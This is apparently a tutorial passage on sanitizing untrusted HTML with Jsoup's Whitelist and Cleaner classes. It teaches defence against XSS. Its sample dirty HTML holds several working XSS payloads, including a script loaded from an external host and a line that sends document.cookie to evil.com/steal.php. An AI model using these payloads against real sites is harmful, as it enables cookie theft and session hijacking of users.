HTML documents are not always well formed. Malformed markup can expose vulnerabilities for attackers to exploit, such as cross-site scripting (XSS). Luckily, Jsoup already provides methods for cleaning these invalid HTML documents. Additionally, Jsoup is capable of parsing incorrect HTML and transforming it into correct markup. Let's have a look at how we can produce a well-formed HTML document.
If you've never heard of XSS before, I suggest you learn more about it before following this section.
Our task in this section is to clean the buggy, XSSed HTML:
<html>
<head>
  <title>Section 05: Clean dirty HTML</title>
  <meta http-equiv="refresh" content="0;url=javascript:alert('xss01');">
  <meta charset="utf-8" />
</head>
<body onload=alert('XSS02')>
  <h1>Jsoup: the HTML parser</h1>
  <script src=http://ha.ckers.org/xss.js></script>
  <img """><script>alert("XSS03")</script>">
  <img src=# onmouseover="alert('xxs04')">
  <script/XSS src="http://ha.ckers.org/xss.js"></script>
  <script/src="http://ha.ckers.org/xss.js"></script>
  <iframe src="javascript:alert('XSS05');"></iframe>
  <img src="http://www.w3.org/html/logo/img/mark-only-icon.png" />
  <img src="www.w3.org/html/logo/img/mark-only-icon.png" />
</body>
</html>
If you open this file in the Chrome or Firefox browser, you will see the XSS in action. Just imagine that if users open this XSSed HTML and are redirected to a page that attackers have total control over, the attackers could, for example, steal the users' cookies, which is very dangerous.
<img """>
<script>
  document.location = 'http://evil.com/steal.php?cookie=' + document.cookie;
</script>">
There are thousands of ways for XSS attacks to occur, so you should guard against them and clean untrusted HTML; it's time for Jsoup to do its job.
1. Load the Document class structure:

   File file = new File("index.html");
   Document doc = Jsoup.parse(file, "utf-8");

2. Create a whitelist:

   Whitelist allowList = Whitelist.relaxed();

3. Add more allowed tags and attributes:

   allowList
       .addTags("meta", "title", "script", "iframe")
       .addAttributes("meta", "charset")
       .addAttributes("iframe", "src")
       .addProtocols("iframe", "src", "http", "https");

4. Create Cleaner, which will do the cleaning task:

   Cleaner cleaner = new Cleaner(allowList);

5. Clean the dirty HTML:

   Document newDoc = cleaner.clean(doc);

6. Print the new, clean HTML:

   System.out.println(newDoc.html());
This is the result of the cleaning:
<html>
<head>
</head>
<body>
  <h1>Jsoup: the HTML parser</h1>
  <script></script>
  <img />
  <script></script>">
  <img />
  <script></script>
  <script></script>
  <iframe></iframe>
  <img src="http://www.w3.org/html/logo/img/mark-only-icon.png" />
  <img />
</body>
</html>
Indeed, the resulting HTML is very clean, and almost no script content remains at all.
The complete example source code for this section is available at \source\Section05.
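The steps above can be combined into one small program; this is a minimal sketch, assuming the dirty file is saved as index.html in the working directory:

```java
import java.io.File;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.safety.Cleaner;
import org.jsoup.safety.Whitelist;

public class CleanDirtyHtml {
    public static void main(String[] args) throws Exception {
        // Parse the dirty HTML file (index.html is a placeholder name)
        File file = new File("index.html");
        Document doc = Jsoup.parse(file, "utf-8");

        // Start from the relaxed() whitelist and chain on the extra rules
        Whitelist allowList = Whitelist.relaxed()
                .addTags("meta", "title", "script", "iframe")
                .addAttributes("meta", "charset")
                .addAttributes("iframe", "src")
                .addProtocols("iframe", "src", "http", "https");

        // Cleaner copies only whitelisted nodes into a fresh Document
        Document newDoc = new Cleaner(allowList).clean(doc);
        System.out.println(newDoc.html());
    }
}
```

The whitelist-builder methods return the Whitelist itself, which is why the configuration can be written as a single chained expression.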
The concept of cleaning dirty HTML in Jsoup is to identify the known safe tags and allow only them into the resulting parse tree. These allowed tags are defined in Whitelist.

Whitelist allowList = Whitelist.relaxed();
allowList
    .addTags("meta", "title", "script", "iframe")
    .addAttributes("meta", "charset")
    .addAttributes("iframe", "src")
    .addProtocols("iframe", "src", "http", "https");
Here we define Whitelist, which is created through the relaxed() method and contains the following tags: a, b, blockquote, br, caption, cite, code, col, colgroup, dd, dl, dt, em, h1, h2, h3, h4, h5, h6, i, img, li, ol, p, pre, q, small, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, u, and ul.
If you want to add more tags, use the method addTags(String... tags). As you can see, the list of tags created through relaxed() doesn't include <meta>, <title>, <script>, and <iframe>, so I added them to the list manually by using addTags().
If the allowed tags have attributes, you should also add the list of allowed attributes for each tag.
One special attribute is src, which contains a URL to a file; it is always good practice to specify an allowed protocol to prevent inline-scripting XSS. Consider the previous buggy HTML line:

<iframe src="javascript:alert('XSS05');"></iframe>
The "src" attribute is supposed to refer to a URL, but here it does not. The fix is to ensure the "src" value is acquired through HTTP or HTTPS. That is what the following line means:

.addProtocols("iframe", "src", "http", "https");
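To see what addProtocols() does in isolation, the following sketch runs two iframe lines through Jsoup's convenience method Jsoup.clean(String, Whitelist); the example.com URL is a placeholder of my own:

```java
import org.jsoup.Jsoup;
import org.jsoup.safety.Whitelist;

public class ProtocolDemo {
    public static void main(String[] args) {
        // Allow iframe with a src attribute, but only http/https URLs
        Whitelist wl = Whitelist.none()
                .addTags("iframe")
                .addAttributes("iframe", "src")
                .addProtocols("iframe", "src", "http", "https");

        // The javascript: URL fails the protocol check, so src is dropped
        System.out.println(Jsoup.clean(
                "<iframe src=\"javascript:alert('XSS05');\"></iframe>", wl));

        // An http: URL passes the check, so src survives
        System.out.println(Jsoup.clean(
                "<iframe src=\"http://example.com/page\"></iframe>", wl));
    }
}
```

The iframe element itself is kept in both cases; only the offending attribute value is removed.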
You can chain calls while adding tags or attributes.
While Whitelist provides the safe tag list, Cleaner, on the other hand, takes the Whitelist as input to clean the input HTML:

Cleaner cleaner = new Cleaner(allowList);
Document newDoc = cleaner.clean(doc);
A new Document is created after the cleaning is done. Cleaner only keeps the allowed HTML tags provided by the Whitelist input; everything else is removed.
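If you only have an HTML fragment as a String rather than a whole Document, jsoup also offers the Jsoup.clean(String, Whitelist) shortcut, which runs the same Cleaner logic internally; a minimal sketch:

```java
import org.jsoup.Jsoup;
import org.jsoup.safety.Whitelist;

public class CleanString {
    public static void main(String[] args) {
        String dirty = "<p>Hello <script>alert('XSS')</script><b>world</b></p>";
        // Parses the fragment, runs a Cleaner, and returns cleaned body HTML
        String safe = Jsoup.clean(dirty, Whitelist.basic());
        System.out.println(safe);
    }
}
```

This is handy for sanitizing user-submitted comments or form input, where you never have a full document to begin with.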
For convenience, Jsoup supports the following five predefined white-lists:

none(): This allows only text nodes; all HTML will be stripped.

simpleText(): This allows only simple text formatting, such as b, em, i, strong, and u.

basic(): This allows a fuller range of text nodes, such as a, b, blockquote, br, cite, code, dd, dl, dt, em, i, li, ol, p, pre, q, small, strike, strong, sub, sup, u, and ul, with appropriate attributes.

basicWithImages(): This allows the same text tags as basic() and also allows img tags, with appropriate attributes, with src pointing to http or https.

relaxed(): This allows a full range of text and structural body HTML tags, such as a, b, blockquote, br, caption, cite, code, col, colgroup, dd, dl, dt, em, h1, h2, h3, h4, h5, h6, i, img, li, ol, p, pre, q, small, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, u, and ul.
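The differences between these white-lists are easiest to see by cleaning one snippet with each of them; a small sketch (the comments describe which tags survive, not the exact output formatting):

```java
import org.jsoup.Jsoup;
import org.jsoup.safety.Whitelist;

public class WhitelistComparison {
    public static void main(String[] args) {
        String html = "<h1>Title</h1><b>bold</b> "
                + "<a href=\"http://example.com\">link</a> <script>alert(1)</script>";

        // none(): every tag is stripped, only text survives
        System.out.println(Jsoup.clean(html, Whitelist.none()));
        // simpleText(): keeps b, but strips h1, a, and script
        System.out.println(Jsoup.clean(html, Whitelist.simpleText()));
        // basic(): additionally keeps the link
        System.out.println(Jsoup.clean(html, Whitelist.basic()));
        // relaxed(): also keeps structural tags such as h1
        System.out.println(Jsoup.clean(html, Whitelist.relaxed()));
    }
}
```

Note that stripping a tag does not remove its text content, so even none() keeps the text that was inside the removed elements.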
If you pay closer attention, you can see that everything inside the <head> tag is removed, even though we allowed those tags in the whitelist in the previous code.
Note
The current version of Jsoup is 1.7.2; see lines 45 and 46 of Cleaner.java on GitHub at the following location:
https://github.com/jhy/jsoup/blob/master/src/main/java/org/jsoup/safety/Cleaner.java#L45
The cleaner keeps and parses only <body>, not <head>, as shown in the following code snippet:

if (dirtyDocument.body() != null)
    copySafeNodes(dirtyDocument.body(), clean.body());
So, if you want to clean the <head> tag instead of having everything in it removed, get the code, modify it, and build your own package. Add the following two lines:

if (dirtyDocument.head() != null)
    copySafeNodes(dirtyDocument.head(), clean.head());
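You can confirm this body-only behavior without modifying jsoup at all; in the following sketch, the cleaned document's <head> comes back empty even though the title tag is whitelisted:

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.safety.Cleaner;
import org.jsoup.safety.Whitelist;

public class HeadIsDropped {
    public static void main(String[] args) {
        Document dirty = Jsoup.parse(
                "<html><head><title>Kept?</title></head>"
                + "<body><p>body text</p></body></html>");

        // title is allowed, but Cleaner never copies nodes from <head>
        Whitelist wl = Whitelist.relaxed().addTags("title");
        Document clean = new Cleaner(wl).clean(dirty);

        System.out.println(clean.head().html());  // empty head
        System.out.println(clean.body().html());  // the <p> survives
    }
}
```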